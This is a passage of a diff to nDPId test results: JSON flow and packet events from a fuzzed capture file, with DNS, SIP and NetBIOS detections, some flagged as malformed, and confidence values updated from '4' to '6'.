00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1120470129591,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470129591,"pkt":"ADBUADRWAODtAW69CABFAABEapwAAIARTLnAqAECwKgBAQrDADUAMM8LVfAAAAABAAAAAAAAATEBMN0wAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470129591,"flow_last_seen":1120470129591,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470129591,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2755,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470129591,"flow_last_seen":1120470129591,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470129591,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2755,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":1120470129593,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470129593,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CsMAR7GHVfCAAAABACVzAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":280,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470129591,"flow_last_seen":1120470129593,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470129593,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2755,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":37,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":280,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470129591,"flow_last_seen":1120470129593,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470129593,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2755,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":37,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":282,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469944224,"flow_last_seen":1120469944224,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470129594,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2716,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":282,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469940218,"flow_last_seen":1120469948230,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470129594,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2738,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":282,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","packets-captured":282,"packets-processed":241,"total-skipped-flows":0,"total-l4-payload-len":24511,"total-not-detected-flows":6,"total-guessed-flows":4,"total-detected-flows":70,"total-detection-updates":26,"total-updates":9,"current-active-flows":63,"total-active-flows":109,"total-idle-flows":46,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":472,"global_ts_msec":1120470141614} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":282,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470141614,"flow_last_seen":1120470141614,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470141614,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2756,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1120470141614,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470141614,"pkt":"ADBUADRWAODtAW69CABFAABIaqIAAIARTK\/AqAECwKgBAQrEADUANAAlcwABAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrACVzAAE="} -00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":282,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470141614,"flow_last_seen":1120470141614,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470141614,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2756,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":9587,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":282,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470141614,"flow_last_seen":1120470141614,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470141614,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2756,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":9587,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":2,"flow_last_seen":1120470142609,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470142609,"pkt":"ADBVADRWAODtAW69CABFAABIaqMAAIARTK7AqAECwKgBAQrEADUANAARKfABVwABAAAAAAAABF\/zaXAEX3VkcANzaXAJY3liZXJjaXSSAmRrAAAhAAE="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":283,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470141614,"flow_last_seen":1120470142609,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470142609,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2756,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_?ip._udp.sip.cybercit?.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":283,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470141614,"flow_last_seen":1120470142609,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470142609,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2756,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_?ip._udp.sip.cybercit?.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":3,"flow_last_seen":1120470144612,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470144612,"pkt":"ADBUADRWAODtAW69CABFAABIaqQAAIARTK3AqAECwKgBAQrEADUANAARKfABAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":284,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470141614,"flow_last_seen":1120470144612,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470144612,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2756,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":284,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470141614,"flow_last_seen":1120470144612,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470144612,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2756,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469970215,"flow_last_seen":1120469970215,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470150621,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":8329,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469970215,"flow_last_seen":1120469970215,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470150621,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":8329,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469956232,"flow_last_seen":1120469956233,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470150621,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2739,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469956232,"flow_last_seen":1120469956233,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470150621,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2739,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469956945,"flow_last_seen":1120469965955,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470150621,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2740,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00693{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1120469572981,"flow_last_seen":1120470129594,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":6089,"flow_avg_l4_payload_len":358,"midstream":0,"thread_ts_msec":1120470150621,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00693{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1120469572981,"flow_last_seen":1120470129594,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":6089,"flow_avg_l4_payload_len":358,"midstream":0,"thread_ts_msec":1120470150621,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470158623,"flow_last_seen":1120470158623,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470158623,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2757,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1120470158623,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470158623,"pkt":"ADBUADRWAODtAW69CABFAABEaqcAAIARTK7AqAECwKgBAQrFADUAMEUJ3\/AAAAABAAAAAAAAATEBdgEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470158623,"flow_last_seen":1120470158623,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470158623,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2757,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.v.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470158623,"flow_last_seen":1120470158623,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470158623,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2757,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.v.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":2,"flow_last_seen":1120470158625,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470158625,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CsUARyeF3\/CAAAABAAEAAAAAAXMBMAElcwAyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00883{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":288,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470158623,"flow_last_seen":1120470158625,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470158625,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2757,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":293,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469973959,"flow_last_seen":1120469973959,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470162147,"l3_proto":"ip4","src_ip":"192.168.130.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2741,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00883{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":288,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470158623,"flow_last_seen":1120470158625,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470158625,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2757,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":293,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469973959,"flow_last_seen":1120469973959,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470162147,"l3_proto":"ip4","src_ip":"192.168.130.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2741,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":293,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469973957,"flow_last_seen":1120469973957,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470162147,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2741,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":293,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470170646,"flow_last_seen":1120470170646,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470170646,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2640,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1120470170646,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470170646,"pkt":"ADBUADRWAODtAW69CABFAABIaqwAAIARTKXAqAECwKgBAQpQADUANOIMR\/IBAAABAAAAAAAABKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} -00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":293,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470170646,"flow_last_seen":1120470170646,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470170646,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2640,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":293,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470170646,"flow_last_seen":1120470170646,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470170646,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2640,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": 